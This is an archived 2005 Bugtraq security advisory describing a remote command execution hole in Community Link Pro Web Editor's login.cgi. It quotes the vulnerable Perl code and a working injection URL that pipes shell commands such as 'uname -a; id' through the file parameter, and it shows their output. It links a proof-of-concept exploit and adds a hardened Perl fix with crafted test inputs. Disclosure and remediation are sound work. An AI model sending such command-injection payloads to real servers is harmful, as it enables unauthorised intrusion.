Bugtraq mailing list archives
[badroot security] Community link pro web editor: Remote command Execution
From: mozako <mozako () mybox it>
Date: Wed, 29 Jun 2005 15:44:58 +0000
- - - - - - - - - - - - - - - - - - - - - - - - -
BADROOT SECURITY GROUP
Security Advisory 2005-#0x05
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
- - - - - - - - - - - - - - - - - - - - - - - - -

Authors ....... spher3 (spher3 at fatalimpulse dot net)
                mozako (admin at fatalimpulse dot net)
Date .......... 29-06-2005
Product ....... Community Link Pro Web Editor (login.cgi)
Type .......... Remote Command Execution

o Description:
============================
login.cgi is a login script written in Perl, from Community Link Pro Web Editor, that allows a remote user to log in to their own personal page.

o Vulnerable Code:
============================
    [...]
    open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}");
    foreach (<FILE2>) {
        print;
    }
    close(FILE2);
    [...]

This code does not validate the CGI query parameters, specifically $FORM{'file'}. Without that check, system commands can be run remotely (Remote Command Execution Vulnerability) with a string like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.

Example:

    http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|

    Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown unknown GNU/Linux
    uid=72(apache) gid=72(apache) groups=72(apache)

o Proof of concept:
============================
You can download a simple PoC Exploit from: http://www.badroot.org/exploits/clogin.pl
Original ADV: http://www.badroot.org/advisories/SA0x05
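
A hardened form of the open() call quoted in the advisory, as an added example that is not part of the original advisory or the vendor's code. Perl's two-argument open() treats a filename ending in | as a command to run, so this version validates both parameters against an allowlist and uses the three-argument form. The function names, the allowlist pattern and the sample data are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not Community Link Pro code: hardened version of the file read.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Allowlist (assumed policy): a single path component made of letters, digits,
# '_', '-' and '.', with no leading dot. This rejects '|', '/', '..' and ''.
sub safe_component {
    my ($value) = @_;
    return defined($value) && $value =~ /\A[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}\z/;
}

# Returns a reference to the file's lines, or undef if a parameter is
# rejected or the file cannot be opened.
sub read_member_file {
    my ($memberspath, $username, $file) = @_;
    return unless safe_component($username) && safe_component($file);
    my $path = File::Spec->catfile($memberspath, $username, $file);
    # Three-argument open: '<' fixes the mode, so $path is only ever a
    # filename and characters such as '|' or '>' have no special meaning.
    open(my $fh, '<', $path) or return;
    my @lines = <$fh>;
    close($fh);
    return \@lines;
}

# Constructed test data: a temporary members directory holding one page.
my $memberspath = tempdir(CLEANUP => 1);
mkdir File::Spec->catdir($memberspath, 'alice') or die "mkdir: $!";
open(my $out, '>', File::Spec->catfile($memberspath, 'alice', 'index.html'))
    or die "open: $!";
print {$out} "<h1>alice</h1>\n";
close($out);

# Constructed inputs: a legitimate request, a value shaped like the advisory's
# file=|COMMAND| string with an empty username, and a traversal attempt.
my @requests = (
    ['alice', 'index.html'],
    ['',      '|COMMAND|'],
    ['alice', '../../etc/passwd'],
);
for my $req (@requests) {
    my ($user, $file) = @$req;
    my $lines = read_member_file($memberspath, $user, $file);
    printf "%-8s %-20s %s\n", "'$user'", "'$file'", $lines ? 'served' : 'rejected';
}
```

Either control on its own closes the command execution path; the allowlist additionally stops directory traversal out of the member's directory.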